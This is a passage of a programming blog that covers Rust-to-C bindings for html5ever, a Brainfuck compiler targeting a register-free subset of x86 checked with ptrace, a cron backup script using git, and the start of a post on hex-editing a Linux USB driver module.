<p>After that I had to <a href="https://github.com/kmcallister/html5ever/commit/89f2f45af0425271d4c79a73f00fd42eca00dad8">get rid of the last references to <code>libstd</code></a>. The biggest obstacle here involved macros and <a href="http://doc.rust-lang.org/tutorial.html#deriving-implementations-for-traits"><code>deriving</code></a>, which would produce references to names under <code>std::</code>. To work around this, I create <a href="https://github.com/kmcallister/html5ever/blob/89f2f45af0425271d4c79a73f00fd42eca00dad8/src/lib.rs#L87-L93">a fake little <code>mod std</code></a> which re-exports the necessary parts of <code>core</code> and <code>collections</code>. This is similar to <a href="https://github.com/rust-lang/rust/blob/0d3bd7720c50e3ada4bac77331d43926493be4fe/src/libstd/lib.rs#L273-L277"><code>libstd</code>'s "curious inner-module"</a>.</p>
<p>I also had to remove all uses of <code>format!()</code>, <code>println!()</code>, etc., or move them inside <code>#[cfg(not(for_c))]</code>. I needed to <a href="https://github.com/kmcallister/html5ever/blob/89f2f45af0425271d4c79a73f00fd42eca00dad8/src/macros.rs#L59-L69">copy in the <code>vec!()</code> macro</a> which is only provided by <code>libstd</code>, even though the <code>Vec</code> type is provided by <code>libcollections</code>. And I had to omit debug log messages when building for C; I did this with <a href="https://github.com/kmcallister/html5ever/blob/89f2f45af0425271d4c79a73f00fd42eca00dad8/src/macros.rs#L71-L90">conditionally-defined macros</a>.</p>
<p>With all this preliminary work done, it was time to write <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/src/for_c/tokenizer.rs">the C bindings</a>. Here's how the struct of function pointers looks on the Rust side:</p>
<pre class="rust"><code>#[repr(C)]
pub struct h5e_token_ops {
    do_start_tag: extern "C" fn(user: *mut c_void, name: h5e_buf,
                                self_closing: c_int, num_attrs: size_t),
    do_tag_attr: extern "C" fn(user: *mut c_void, name: h5e_buf,
                               value: h5e_buf),
    do_end_tag: extern "C" fn(user: *mut c_void, name: h5e_buf),
    // ...
}</code></pre>
<p>The <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/src/for_c/tokenizer.rs#L49-L111">processing of tokens</a> is straightforward. We pattern-match and then call the appropriate function pointer, <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/src/for_c/tokenizer.rs#L53">unless</a> that pointer is NULL. (<b>Edit:</b> eddyb points out that storing NULL as an <code>extern "C" fn</code> is undefined behavior. Better to use <code>Option&lt;extern "C" fn ...&gt;</code>, which will optimize to the same one-word representation.)</p>
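<p>That claim is easy to check from safe code: <code>Option</code> of an <code>extern "C" fn</code> uses the null pointer to represent <code>None</code>, so it costs nothing over the bare pointer. A minimal sketch (the callback type here is a stand-in, not html5ever's real signature):</p>

```rust
use std::ffi::c_void;
use std::mem::size_of;

// Stand-in for one of the h5e_token_ops callbacks (hypothetical signature).
type StartTagFn = extern "C" fn(user: *mut c_void);

fn dispatch(cb: Option<StartTagFn>, user: *mut c_void) {
    // `None` is represented as the NULL pointer, so this compiles down to
    // the same null test the C side would write, with no UB on the Rust side.
    if let Some(f) = cb {
        f(user);
    }
}

extern "C" fn on_start_tag(_user: *mut c_void) {
    println!("start tag");
}

fn main() {
    // The niche optimization: Option adds no space over the bare fn pointer.
    assert_eq!(size_of::<Option<StartTagFn>>(), size_of::<StartTagFn>());

    dispatch(Some(on_start_tag), std::ptr::null_mut());
    dispatch(None, std::ptr::null_mut()); // skipped, like the NULL check
}
```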
<p>To <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/src/for_c/tokenizer.rs#L115-L122">create a tokenizer</a>, we heap-allocate the Rust data structure in a <a href="http://doc.rust-lang.org/alloc/boxed/index.html"><code>Box</code></a>, and then <a href="http://doc.rust-lang.org/core/intrinsics/ffi.transmute.html">transmute</a> that to a raw C pointer. When the C client calls <code>h5e_tokenizer_free</code>, we transmute this pointer back to a box and <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/src/for_c/tokenizer.rs#L126">drop it</a>, which will invoke destructors and finally free the memory.</p>
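<p>The <code>transmute</code> works, but today's Rust spells this round trip more directly with <code>Box::into_raw</code> and <code>Box::from_raw</code>. A minimal sketch of the pattern, with a placeholder <code>Tokenizer</code> struct standing in for html5ever's:</p>

```rust
struct Tokenizer {
    bytes_fed: usize,
}

// What h5e_tokenizer_new does, minus the FFI declarations:
fn tokenizer_new() -> *mut Tokenizer {
    // Heap-allocate, then give up ownership as a raw pointer for C to hold.
    Box::into_raw(Box::new(Tokenizer { bytes_fed: 0 }))
}

// What h5e_tokenizer_free does: reconstitute the Box and drop it,
// which runs destructors and frees the memory.
unsafe fn tokenizer_free(tok: *mut Tokenizer) {
    drop(Box::from_raw(tok));
}

fn main() {
    let tok = tokenizer_new();
    unsafe {
        (*tok).bytes_fed += 13;
        assert_eq!((*tok).bytes_fed, 13);
        tokenizer_free(tok);
    }
}
```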
<p>You'll note that the functions exported to C have several special annotations:</p>
<ul class="incremental">
<li><code>#[no_mangle]</code>: skip <a href="http://en.wikipedia.org/wiki/Name_mangling">name mangling</a>, so we end up with a linker symbol named <code>h5e_tokenizer_free</code> instead of <code>_ZN5for_c9tokenizer18h5e_tokenizer_free</code>.</li>
<li><code>unsafe</code>: don't let Rust code call these functions unless it <a href="http://doc.rust-lang.org/rust.html#unsafe-blocks">promises to be careful</a>.</li>
<li><code>extern "C"</code>: make sure the exported function has a C-compatible <a href="http://en.wikipedia.org/wiki/Application_binary_interface">ABI</a>. The data structures similarly get a <code>#[repr(C)]</code> attribute.</li>
</ul>
<p>Then I wrote a <a href="https://github.com/kmcallister/html5ever/blob/cb98c0cb700835f7473a9fc09a7ee9564ef3c73e/capi/html5ever.h">C header file</a> matching this ABI:</p>
<pre class="sourceCode c"><code class="sourceCode c"><span class="kw">struct</span> h5e_buf {
    <span class="dt">unsigned</span> <span class="dt">char</span> *data;
    size_t len;
};

<span class="kw">struct</span> h5e_buf h5e_buf_from_cstr(<span class="dt">const</span> <span class="dt">char</span> *str);

<span class="kw">struct</span> h5e_token_ops {
    <span class="dt">void</span> (*do_start_tag)(<span class="dt">void</span> *user, <span class="kw">struct</span> h5e_buf name,
                         <span class="dt">int</span> self_closing, size_t num_attrs);
    <span class="dt">void</span> (*do_tag_attr)(<span class="dt">void</span> *user, <span class="kw">struct</span> h5e_buf name,
                        <span class="kw">struct</span> h5e_buf value);
    <span class="dt">void</span> (*do_end_tag)(<span class="dt">void</span> *user, <span class="kw">struct</span> h5e_buf name);
    <span class="co">// ...</span>
};

<span class="kw">struct</span> h5e_tokenizer;

<span class="kw">struct</span> h5e_tokenizer *h5e_tokenizer_new(<span class="kw">struct</span> h5e_token_sink *sink);
<span class="dt">void</span> h5e_tokenizer_free(<span class="kw">struct</span> h5e_tokenizer *tok);
<span class="dt">void</span> h5e_tokenizer_feed(<span class="kw">struct</span> h5e_tokenizer *tok, <span class="kw">struct</span> h5e_buf buf);
<span class="dt">void</span> h5e_tokenizer_end(<span class="kw">struct</span> h5e_tokenizer *tok);</code></pre>
<p>One remaining issue is that Rust is hard-wired to use <a href="http://www.canonware.com/jemalloc/">jemalloc</a>, so linking html5ever will bring that in alongside the system's libc malloc. Having two separate malloc heaps will likely increase memory consumption, and it prevents us from doing fun things like allocating <code>Box</code>es in Rust that can be used and freed in C. Before Rust can really be a great choice for writing C libraries, we need a better solution for integrating the allocators.</p>
<p>If you'd like to talk about calling Rust from C, you can find me as <code>kmc</code> in <code>#rust</code> and <code>#rust-internals</code> on <code>irc.mozilla.org</code>. And if you run into any issues with html5ever, do let me know, preferably by <a href="https://github.com/kmcallister/html5ever/issues">opening an issue on GitHub</a>. Happy hacking!</p>keeganhttp://www.blogger.com/profile/12227260241426017476noreply@blogger.com203tag:blogger.com,1999:blog-1563623855220143059.post-55245078295260126032014-02-11T21:50:00.000-08:002014-02-11T21:50:25.291-08:00x86 is Turing-complete with no registers<p><em>In which x86 has too many registers after all.</em></p>
<h1 id="introduction">Introduction</h1>
<p>The fiendish complexity of the x86 instruction set means that even bizarrely restricted subsets are capable of arbitrary computation. As others have shown, we can compute using <a href="http://www.phrack.org/issues.html?issue=57&id=15#article">alphanumeric machine code</a> or <a href="http://www.cs.jhu.edu/~sam/ccs243-mason.pdf">English sentences</a>, using <a href="http://www.cl.cam.ac.uk/~sd601/papers/mov.pdf">only the <code>mov</code> instruction</a>, or <a href="https://github.com/jbangert/trapcc">using the MMU</a> as it handles a never-ending double-fault. Here is my contribution to this genre of <a href="http://esolangs.org/wiki/Turing_tarpit">Turing tarpit</a>: x86 is <a href="http://esolangs.org/wiki/Turing-complete">Turing-complete</a> with no registers.</p>
<h1 id="no-registers">No registers?</h1>
<p>What do I mean by "no registers"? Well, really just whatever makes the puzzle interesting, but the basic guideline is:</p>
<blockquote>
<p>No instruction's observable behavior can depend on the contents of any ordinary user-space register.</p>
</blockquote>
<p>So we can't read from <code>R[ABCD]X</code>, <code>R[SD]I</code>, <code>R[SB]P</code> (that's right, no stack), <code>R8</code>-<code>R15</code>, any of their smaller sub-registers, or any of the x87 / MMX / SSE registers. This forbids implicit register access like <code>push</code> or <code>movsb</code> as well as explicit operands. I think I would allow <code>RIP</code>-relative addressing, but it's probably not useful when you're building a single executable which loads at a fixed address.</p>
<p>We also can't use the condition flags in <code>EFLAGS</code>, so conditional jumps and moves are right out. Many instructions will set these flags, but those dead stores are okay by me.</p>
<p>All memory access depends on segment selectors, the page table base in <code>CR3</code>, and so on. We trust that the OS (Linux in my example) has set up a reasonable flat memory model, and we shouldn't try to modify that. Likewise there are debug registers, parts of <code>EFLAGS</code> (such as the trap bit), and numerous <a href="http://wiki.osdev.org/Model_Specific_Registers">MSRs</a> which can influence the execution of nearly any instruction. We ignore all that too. Basically, the parts of CPU state which normal user-space code doesn't touch are treated as constants.</p>
<p>So what's left that we can work with? Just</p>
<ul class="incremental">
<li>the instruction pointer,</li>
<li>memory operands, and</li>
<li>self-modifying code.</li>
</ul>
<p>But it would be too easy to self-modify an instruction into having a register operand. The above restrictions must hold for every instruction we execute, not just those appearing in our binary. Later on I'll demonstrate experimentally that we aren't cheating.</p>
<h1 id="the-instruction-set">The instruction set</h1>
<p>In a RISC architecture, every memory access is a register load or store, and our task would be completely impossible. But x86 does not have this property. For example we can store a constant directly into memory. Here's machine code along with NASM (Intel syntax) assembly:</p>
<pre><code>c6042500004000ba            mov byte [0x400000], 0xba
66c7042500004000dbba        mov word [0x400000], 0xbadb
c7042500004000efbead0b      mov dword [0x400000], 0xbadbeef
48c7042500004000efbead0b    mov qword [0x400000], 0xbadbeef</code></pre>
<p>In the latter case the 4-byte constant is <a href="http://en.wikipedia.org/wiki/Sign_extension">sign-extended</a> to 8 bytes.</p>
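<p>The widening rule is just ordinary signed conversion, which we can write out in any language (plain arithmetic here, nothing x86-specific):</p>

```rust
fn main() {
    // mov qword takes only a 4-byte immediate, sign-extended to 8 bytes.
    // 0x0badbeef has its high bit clear, so widening changes nothing:
    let imm: i32 = 0x0badbeef;
    assert_eq!(imm as i64, 0x0badbeef_i64);

    // With the high bit set, the sign extension becomes visible:
    let imm: i32 = 0x8000_0000u32 as i32;
    assert_eq!(imm as i64 as u64, 0xffff_ffff_8000_0000u64);

    // So `mov qword [addr], imm32` can only store values representable
    // as a sign-extended 32-bit immediate.
}
```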
<p>We can also perform arithmetic on a memory location in place:</p>
<pre><code>8304250000400010 add dword [0x400000], 0x10</code></pre>
<p>But moving data around is going to be hard. As far as I know, every instruction which loads from one address and stores to another, for example <code>movsb</code>, depends on registers in some way.</p>
<p>Conditional control flow is possible thanks to this gem of an instruction:</p>
<pre><code>ff242500004000 jmp qword [0x400000]</code></pre>
<p>This jumps to whatever address is stored as a 64-bit quantity at address 0x400000. This seems weird but it's really just a load where the destination register is the instruction pointer. Many RISC architectures also allow this.</p>
<h1 id="compiling-from-brainfuck">Compiling from Brainfuck</h1>
<p>Let's get more concrete and talk about compiling <a href="http://esolangs.org/wiki/Brainfuck">Brainfuck</a> code to this subset of x86. Brainfuck isn't the simplest language out there (try <a href="http://esolangs.org/wiki/Subleq">Subleq</a>) but it's pretty familiar as an imperative, structured-control language. So I think compiling from Brainfuck makes this feel "more real" than compiling from something super weird.</p>
<p>A Brainfuck program executes on a linear tape of (<a href="http://esolangs.org/wiki/Brainfuck#Memory_and_wrapping">typically</a>) byte-size cells.</p>
<pre><code>TAPE_SIZE equ 30000

tape_start:
    times TAPE_SIZE dq cell0

head equ tape_start + (TAPE_SIZE / 2)</code></pre>
<p>Like many Brainfuck implementations, the tape has a fixed size (more on this later) and we start in the middle. <code>head</code> is not a variable with a memory location; it's just an assembler constant for the address of the middle of the tape.</p>
<p>Since our only way to read memory is <code>jmp [addr]</code>, the tape must store pointers to code. We create 256 short routines, each representing one of the values a cell can hold.</p>
<pre><code>cont_zero:    dq 0
cont_nonzero: dq 0
out_byte:     db 0

align 16
cell_underflow:
    jmp inc_cell

align 16
cell0:
    mov byte [out_byte], 0
    jmp [cont_zero]

%assign cellval 1
%rep 255
    align 16
    mov byte [out_byte], cellval
    jmp [cont_nonzero]
    %assign cellval cellval+1
%endrep

align 16
cell_overflow:
    jmp dec_cell</code></pre>
<p>There are two things we need to do with a cell: get its byte value for output, and test whether it's zero. So each routine moves a byte into <code>out_byte</code> and jumps to the address stored at either <code>cont_zero</code> or <code>cont_nonzero</code>.</p>
<p>We produce most of the routines using a <a href="http://www.nasm.us/doc/nasmdoc4.html">NASM macro</a>. We also have functions to handle underflow and overflow, so a cell which would reach -1 or 256 is bumped back to 0 or 255. (We could implement the more typical wrap-around behavior with somewhat more code.)</p>
<p>The routines are aligned on 16-byte boundaries so that we can implement Brainfuck's <code>+</code> and <code>-</code> by adding or subtracting 16. But how do we know where the head is? We can't store it in a simple memory variable because we'd need a double-indirect jump instruction. This is where the self-modifying code comes in.</p>
<pre><code>test_cell:
    jmp [head]

inc_cell:
    add qword [head], 16
    jmp test_cell

dec_cell:
    sub qword [head], 16
    jmp test_cell

move_right:
    add dword [inc_cell+4], 8
    add dword [dec_cell+4], 8
    add dword [test_cell+3], 8
    jmp [cont_zero]

move_left:
    sub dword [inc_cell+4], 8
    sub dword [dec_cell+4], 8
    sub dword [test_cell+3], 8
    jmp [cont_zero]</code></pre>
<p>Recall that <code>head</code> is an assembler constant for the middle of the tape. So <code>inc_cell</code> etc. will only touch the exact middle of the tape — except that we modify the instructions when we move left or right. The address operand starts at byte 3 or 4 of the instruction (check the disassembly!) and we change it by 8, the size of a function pointer.</p>
<p>Also note that <code>inc_cell</code> and <code>dec_cell</code> jump to <code>test_cell</code> in order to handle overflow / underflow. By contrast the move instructions don't test the current cell and just jump to <code>[cont_zero]</code> unconditionally.</p>
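<p>To see how the pieces fit together, here is a toy model of the scheme in ordinary code: the tape holds code addresses, <code>+</code>/<code>-</code> are a single in-place add or subtract of 16, and moving the head changes which slot the arithmetic targets. (The base address is made up; this models the trick, it is not the generated code.)</p>

```rust
const STRIDE: usize = 16;      // routines are 16-byte aligned
const CELL0: usize = 0x400100; // pretend address of the cell0 routine

fn main() {
    // Every tape slot starts out pointing at the routine for value 0.
    let mut tape = vec![CELL0; 8];
    let mut head = 4; // models patching inc_cell / dec_cell / test_cell

    // A routine's address encodes the cell's value, STRIDE bytes apart.
    let value = |slot: usize| (slot - CELL0) / STRIDE;

    tape[head] += STRIDE; // Brainfuck `+`: one add, no load/store pair
    tape[head] += STRIDE;
    assert_eq!(value(tape[head]), 2);

    head += 1;            // `>`: bump the patched address operands
    tape[head] += STRIDE; // `+` now acts on the new cell
    assert_eq!(value(tape[head]), 1);

    // "Jumping through" tape[head] is the model of `jmp [head]`:
    // the routine reached knows the cell's current value.
    let cells: Vec<usize> = tape.iter().map(|&s| value(s)).collect();
    println!("cells: {:?}", cells); // prints cells: [0, 0, 0, 0, 2, 1, 0, 0]
}
```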
<p>To output a byte we <a href="https://github.com/kmcallister/rip/blob/4595341f8635c184f620a01a944a84c700e3641d/rip.asm#L7-L14">perform</a> the system call <a href="http://man7.org/linux/man-pages/man2/write.2.html"><code>write</code></a><code>(1, &out_byte, 1)</code>. There's no escaping the fact that the <a href="http://stackoverflow.com/questions/2535989/what-are-the-calling-conventions-for-unix-linux-system-calls-on-x86-64">Linux system call ABI</a> uses registers, so I allow them here. We can do arbitrary computation without output; it's just nice if we can see the results. Input is <a href="https://github.com/kmcallister/rip/blob/4595341f8635c184f620a01a944a84c700e3641d/rip.asm#L73-L88">messier still</a> but it's not fundamentally different from what we've seen here. Code that self-modifies by calling <a href="http://man7.org/linux/man-pages/man2/read.2.html"><code>read</code></a><code>()</code> is clearly the future of computing.</p>
<p>Putting it all together, I wrote a small <a href="https://github.com/kmcallister/rip/blob/4595341f8635c184f620a01a944a84c700e3641d/compiler">Brainfuck compiler</a> which does little more than match brackets. For each Brainfuck instruction it outputs one line of assembly, a call to a <a href="https://github.com/kmcallister/rip/blob/4595341f8635c184f620a01a944a84c700e3641d/rip.asm#L91-L135">NASM macro</a> which will load <code>cont_[non]zero</code> and jump to one of <code>test_cell</code>, <code>inc_cell</code>, etc. For the program <code>[+]</code> the compiler's output looks like</p>
<pre><code>k00000000: do_branch k00000003, k00000001
k00000001: do_inc    k00000002
k00000002: do_branch k00000003, k00000001
k00000003: jmp exit</code></pre>
<p>which blows up into something like</p>
<pre><code>401205: 48c70425611240005c124000    mov qword ptr [0x401261], 0x40125c
401211: 48c704256912400022124000    mov qword ptr [0x401269], 0x401222
40121d: e90cefffff                  jmp 40012e &lt;test_cell&gt;
401222: 48c70425611240003f124000    mov qword ptr [0x401261], 0x40123f
40122e: 48c70425691240003f124000    mov qword ptr [0x401269], 0x40123f
40123a: e9f6eeffff                  jmp 400135 &lt;inc_cell&gt;
40123f: 48c70425611240005c124000    mov qword ptr [0x401261], 0x40125c
40124b: 48c704256912400022124000    mov qword ptr [0x401269], 0x401222
401257: e9d2eeffff                  jmp 40012e &lt;test_cell&gt;
40125c: e9c1eeffff                  jmp 400122 &lt;exit&gt;</code></pre>
<p>Even within our constraints, this code could be a lot more compact. For example, a <code>test</code> could be merged with a preceding <code>inc</code> or <code>dec</code>.</p>
<h1 id="demos">Demos</h1>
<p>Let's try it out on some of Daniel B Cristofani's <a href="http://www.hevanet.com/cristofd/brainfuck/">Brainfuck examples</a>.</p>
<pre><code>$ curl -s http://www.hevanet.com/cristofd/brainfuck/rot13.b | ./compiler
$ echo 'Uryyb, jbeyq!' | ./rip
Hello, world!
$ curl -s http://www.hevanet.com/cristofd/brainfuck/fib.b | ./compiler
$ ./rip
0
1
1
2
3
5
8
13
…</code></pre>
<p>And now let's try a Brainfuck interpreter written in Brainfuck. There are <a href="http://esolangs.org/wiki/Brainfuck#Self-interpreters">several</a>, but we will choose the <a href="http://homepages.xnet.co.nz/~clive/eigenratios/cgbfi2.b">fastest one</a> (by Clive Gifford), which is also compatible with our handling of end-of-file and cell overflow.</p>
<pre><code>$ curl -s http://homepages.xnet.co.nz/~clive/eigenratios/cgbfi2.b | ./compiler
$ (curl -s http://www.hevanet.com/cristofd/brainfuck/rot13.b;
echo '!Uryyb, jbeyq!') | ./rip
Hello, world!</code></pre>
<p>This takes about 4.5 seconds on my machine.</p>
<h1 id="verifying-it-with-ptrace">Verifying it with <code>ptrace</code></h1>
<p>How can we verify that a program doesn't use registers? There's no CPU flag to disable registers, but setting them to zero after each instruction is close enough. Linux's <a href="http://man7.org/linux/man-pages/man2/ptrace.2.html"><code>ptrace</code></a> system call allows us to manipulate the state of a target process.</p>
<pre class="sourceCode c"><code class="sourceCode c"><span class="dt">uint64_t</span> regs_boundary;

<span class="dt">void</span> clobber_regs(pid_t child) {
    <span class="kw">struct</span> user_regs_struct regs_int;
    <span class="kw">struct</span> user_fpregs_struct regs_fp;

    CHECK(ptrace(PTRACE_GETREGS, child, <span class="dv">0</span>, &regs_int));
    <span class="kw">if</span> (regs_int.rip &lt; regs_boundary)
        <span class="kw">return</span>;
    CHECK(ptrace(PTRACE_GETFPREGS, child, <span class="dv">0</span>, &regs_fp));

    <span class="co">// Clear everything before the instruction pointer,</span>
    <span class="co">// plus the stack pointer and some bits of EFLAGS.</span>
    memset(&regs_int, <span class="dv">0</span>, offsetof(<span class="kw">struct</span> user_regs_struct, rip));
    regs_int.rsp = <span class="dv">0</span>;
    regs_int.eflags &= EFLAGS_MASK;

    <span class="co">// Clear x87 and SSE registers.</span>
    memset(regs_fp.st_space, <span class="dv">0</span>, <span class="kw">sizeof</span>(regs_fp.st_space));
    memset(regs_fp.xmm_space, <span class="dv">0</span>, <span class="kw">sizeof</span>(regs_fp.xmm_space));

    CHECK(ptrace(PTRACE_SETREGS, child, <span class="dv">0</span>, &regs_int));
    CHECK(ptrace(PTRACE_SETFPREGS, child, <span class="dv">0</span>, &regs_fp));

    clobber_count++;
}</code></pre>
<p>For the layout of <code>struct user_regs_struct</code>, see <a href="https://sourceware.org/git/?p=glibc.git;a=blob;f=sysdeps/unix/sysv/linux/x86/sys/user.h;h=02d3db78891a409c79571343cd732a9cdcdc868a;hb=eefa3be8e4c2c721a9f277d8ea2e11180231829f#l42"><code>/usr/include/sys/user.h</code></a>.</p>
<p>We allow registers in the first part of the program, which is responsible for system calls. <code>regs_boundary</code> is set by <a href="https://github.com/kmcallister/rip/blob/4595341f8635c184f620a01a944a84c700e3641d/regclobber.c#L42-L58">looking</a> for the symbol <code>FORBID_REGS</code> in the binary.</p>
<p>We run the target using <code>PTRACE_SINGLESTEP</code>, which sets the <a href="http://en.wikipedia.org/wiki/Trap_flag">trap flag</a> so that the CPU will raise a <a href="http://wiki.osdev.org/Exceptions#Debug">debug exception</a> after one instruction. Linux handles this exception, suspends the traced process, and wakes up the tracer, which was blocked on <a href="http://man7.org/linux/man-pages/man2/waitpid.2.html"><code>waitpid</code></a>.</p>
<pre class="sourceCode c"><code class="sourceCode c"><span class="kw">while</span> (<span class="dv">1</span>) {
    <span class="co">// For this demo it's simpler if we don't deliver signals to</span>
    <span class="co">// the child, so the last argument to ptrace() is zero.</span>
    CHECK(ptrace(PTRACE_SINGLESTEP, child, <span class="dv">0</span>, <span class="dv">0</span>));
    CHECK(waitpid(child, &status, <span class="dv">0</span>));

    <span class="kw">if</span> (WIFEXITED(status))
        finish(WEXITSTATUS(status));

    inst_count++;
    clobber_regs(child);
}</code></pre>
<p>And the demo:</p>
<pre><code>$ gcc -O2 -Wall -o regclobber regclobber.c
$ curl -s http://www.hevanet.com/cristofd/brainfuck/rot13.b | ./compiler
$ echo 'Uryyb, jbeyq!' | time ./regclobber ./rip
Hello, world!
Executed 81366 instructions; clobbered registers 81189 times.
0.36user 1.81system 0:01.96elapsed 110%CPU (0avgtext+0avgdata 1392maxresident)k</code></pre>
<p>At almost two seconds elapsed, this is hundreds of times slower than running <code>./rip</code> directly. Most of the time is spent in the kernel, handling all those system calls and debug exceptions.</p>
<p>I <a href="http://mainisusuallyafunction.blogspot.com/2011/01/implementing-breakpoints-on-x86-linux.html">wrote about <code>ptrace</code> before</a> if you'd like to see more of the things it can do.</p>
<h1 id="notes-on-universality">Notes on universality</h1>
<p>Our tape has a fixed size of 30,000 cells, the same as Urban Müller's original Brainfuck compiler. A system with a finite amount of state can't really be Turing-complete. But x86 itself also has a limit on addressable memory. So does C, because <span style="white-space:nowrap;"><code>sizeof(void *)</code></span> is finite. These systems <em>are</em> Turing-complete when you add an external tape using I/O, but so is a <a href="http://en.wikipedia.org/wiki/Finite-state_machine">finite-state machine</a>!</p>
<p>So while x86 isn't really Turing-complete, with or without registers, I think the above construction "feels like" arbitrary computation enough to meet the informal definition of "Turing-complete" commonly used by programmers, for example in the <a href="http://www.cl.cam.ac.uk/~sd601/papers/mov.pdf"><em><code>mov</code> is Turing-complete</em></a> paper. If you know of a way to formalize this idea, do let me know (I'm more likely to notice tweets <a href="https://twitter.com/miuaf"><code>@miuaf</code></a> than comments here).</p>keeganhttp://www.blogger.com/profile/12227260241426017476noreply@blogger.com685tag:blogger.com,1999:blog-1563623855220143059.post-72036355193355592712012-12-30T20:36:00.000-08:002012-12-30T20:36:43.751-08:00A shell recipe for backups with logs and history<p>I wrote a shell script for a <a href="http://en.wikipedia.org/wiki/Cron">cron</a> job that grabs backups of some remote files. It has a few nice features:</p>
<ul class="incremental">
<li>Output from the backup commands is logged, with timestamps.</li>
<li><code>cron</code> will send me email if one of the commands fails.</li>
<li>The history of each backup is saved in Git. Nothing sucks more than corrupting an important file and then syncing that corruption to your one and only backup.</li>
</ul>
<p>Here's how it works.</p>
<pre class="sourceCode bash"><code class="sourceCode bash"><span class="co">#!/bin/bash -e</span>
<span class="kw">cd</span> /home/keegan/backups
<span class="ot">log=</span><span class="st">"</span><span class="ot">$(</span><span class="kw">pwd</span><span class="ot">)</span><span class="st">"</span>/log
<span class="kw">exec</span> <span class="kw">3>&2</span> <span class="kw">></span> <span class="kw">>(</span>ts <span class="kw">>></span> <span class="st">"</span><span class="ot">$log</span><span class="st">"</span><span class="kw">)</span> <span class="kw">2>&1</span></code></pre>
<p>You may have seen <code>exec</code> used to <a href="http://en.wikipedia.org/wiki/Tail_call">tail-call</a> a command, but here we use it differently. When no command is given, <code>exec</code> <a href="http://tldp.org/LDP/abs/html/x17891.html">applies</a> file redirections to the current shell process.</p>
<p>We apply timestamps by redirecting output through <code>ts</code> (from <a href="http://joeyh.name/code/moreutils/">moreutils</a>), and append that to the log file. I would write <span class="nowrap"><code>exec | ts >> $log</code></span>, except that pipe syntax is not supported with <code>exec</code>.</p>
<p>Instead we use <a href="http://tldp.org/LDP/abs/html/process-sub.html">process substitution</a>. <code>>(cmd)</code> expands to the name of a file, whose contents will be sent to the specified command. This file name is a fine target for normal file output redirection with <code>></code>. (It might name a temporary file created by the shell, or a special file under <code>/dev/fd/</code>.)</p>
<p>We also redirect standard error to the same place with <code>2>&1</code>. But first we open the original standard error as file descriptor 3, using <code>3>&2</code>.</p>
<pre class="sourceCode bash"><code class="sourceCode bash"><span class="kw">function</span><span class="fu"> handle_error</span> <span class="kw">{</span>
    <span class="kw">echo</span> <span class="st">'Error occurred while running backup'</span> <span class="kw">>&3</span>
    <span class="kw">tail</span> <span class="st">"</span><span class="ot">$log</span><span class="st">"</span> <span class="kw">>&3</span>
    <span class="kw">exit</span> 1
<span class="kw">}</span>

<span class="kw">trap</span> handle_error ERR</code></pre>
<p>Since we specified <code>bash -e</code> in the first line of the script, Bash will exit as soon as any command fails. We use <code>trap</code> to register a function that gets called if this happens. The function writes some of the log file to the script's original standard error, which we saved as file descriptor 3. <code>cron</code> will capture that and send mail to the system administrator.</p>
<p>Now we come to the actual backup commands.</p>
<pre class="sourceCode bash"><code class="sourceCode bash"><span class="kw">cd</span> foo
git pull

<span class="kw">cd</span> ../bar
rsync -v otherhost:bar/baz .
git commit --allow-empty -a -m <span class="st">'[AUTO] backup'</span>
git repack -da</code></pre>
<p><code>foo</code> is a backup of a Git repo, so we just update a clone of that repo. If you want to be absolutely sure to preserve all commits, you can configure the backup repo to <a href="http://www.kernel.org/pub/software/scm/git/docs/git-gc.html">disable automatic garbage collection</a> and <a href="http://stackoverflow.com/questions/199728/setting-gc-reflogexpire">keep infinite reflog</a>.</p>
<p><code>bar</code> is a local-only Git repo storing history of a file synced from another machine. Semantically, Git stores each version of a file as a separate <a href="http://git-scm.com/book/en/Git-Internals-Git-Objects">blob</a> object. If the files you're backing up are reasonably large, this can waste a lot of space quickly. But Git supports "packed" storage, where the objects in a repo are compressed together. By <a href="http://www.kernel.org/pub/software/scm/git/docs/git-repack.html">repacking</a> the repo after every commit, we can save a ton of space.</p>keeganhttp://www.blogger.com/profile/12227260241426017476noreply@blogger.com63tag:blogger.com,1999:blog-1563623855220143059.post-30377582864657990412012-12-17T23:18:00.000-08:002012-12-17T23:18:00.065-08:00Hex-editing Linux kernel modules to support new hardware
<p>This is <a href="http://sourceforge.net/apps/mediawiki/mbm/index.php?title=Hex-editing_cdc_ether">an old trick</a> but a fun one. The <a href="http://en.wikipedia.org/wiki/ThinkPad_X1_Carbon">ThinkPad X1 Carbon</a> has no built-in Ethernet port. Instead it comes with a USB to Ethernet adapter. The adapter uses the <a href="http://www.asix.com.tw/products.php?op=pItemdetail&PItemID=86;71;101">ASIX AX88772</a> chip, which Linux has supported since <a href="https://github.com/torvalds/linux/commit/1da177e4c3f41524e886b7f1b8a0c1fc7321cac2">time immemorial</a>. But support for the particular adapter shipped by Lenovo was only added in Linux 3.7.</p>
<p>This was a problem for me, since I wanted to use a Debian installer with a 3.2 kernel. I could set up a build environment for that particular kernel and recompile the module. But this seemed like an annoying yak to shave when I just wanted to get the machine working.</p>
<p><a href="https://github.com/torvalds/linux/commit/66dc81ecd71332783c92fb170950d5ddb43da461">The patch</a> to support the Lenovo adapter just adds a new USB device ID to an existing driver:</p>
<pre><code> }, {
<span style="color: green; font-weight: bold;">+ // Lenovo U2L100P 10/100
+ USB_DEVICE (0x17ef, 0x7203),
+ .driver_info = (unsigned long) &ax88772_info,
+}, {</span>
 // ASIX AX88772B 10/100
 USB_DEVICE (0x0b95, 0x772b),
 .driver_info = (unsigned long) &ax88772_info,</code></pre>
<p>As a quick-and-dirty solution, we can edit the compiled kernel module <code>asix.ko</code>, changing that existing device ID <code>(0x0b95, 0x772b)</code> to the Lenovo one <code>(0x17ef, 0x7203)</code>. Since x86 CPUs are <a href="http://en.wikipedia.org/wiki/Endianness">little-endian</a>, this involves changing the bytes</p>
<pre><code>95 0b 2b 77</code></pre>
<p>to</p>
<pre><code>ef 17 03 72</code></pre>
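<p>Those byte strings can be double-checked against the IDs from the patch (a quick Rust sanity check, not part of the install procedure):</p>

```rust
fn main() {
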